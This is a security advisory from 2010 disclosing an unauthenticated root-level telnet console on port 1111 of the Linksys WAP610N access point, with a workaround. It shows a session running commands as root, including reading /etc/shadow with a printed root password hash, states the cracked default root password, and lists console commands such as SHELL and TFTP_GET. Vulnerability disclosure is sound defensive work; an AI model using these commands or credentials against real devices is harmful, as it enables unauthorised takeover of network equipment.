Linksys WAP610N Unauthenticated Root Access Security Vulnerability

in

Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo () securenetwork it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL:
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt


*** SUMMARY ***

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

Unauthenticated remote textual administration console has been found that
allow an attacker to run system command as root user.


*** VULNERABILITY DETAILS ***

telnet 1111

Command> system id
Output> uid=0(root) gid=0(root)

Coomand> system cat /etc/shadow
Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup> bin:*:10933:0:99999:7:::
Ouptup> daemon:*:10933:0:99999:7:::
Ouptup> adm:*:10933:0:99999:7:::
Ouptup> lp:*:10933:0:99999:7:::
Ouptup> sync:*:10933:0:99999:7:::
Ouptup> shutdown:*:10933:0:99999:7:::
Ouptup> halt:*:10933:0:99999:7:::
Ouptup> uucp:*:10933

root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)

List of console's command:

ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ
HYP_WRITE
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER


*** EXPLOIT ***

Attackers may exploit these issues through a common telnet client as explained
above.


*** FIX INFORMATION ***

No patch is available.

*** WORKAROUNDS ***

Put access points on separate wired network and filter network traffic to/from
1111 tcp port.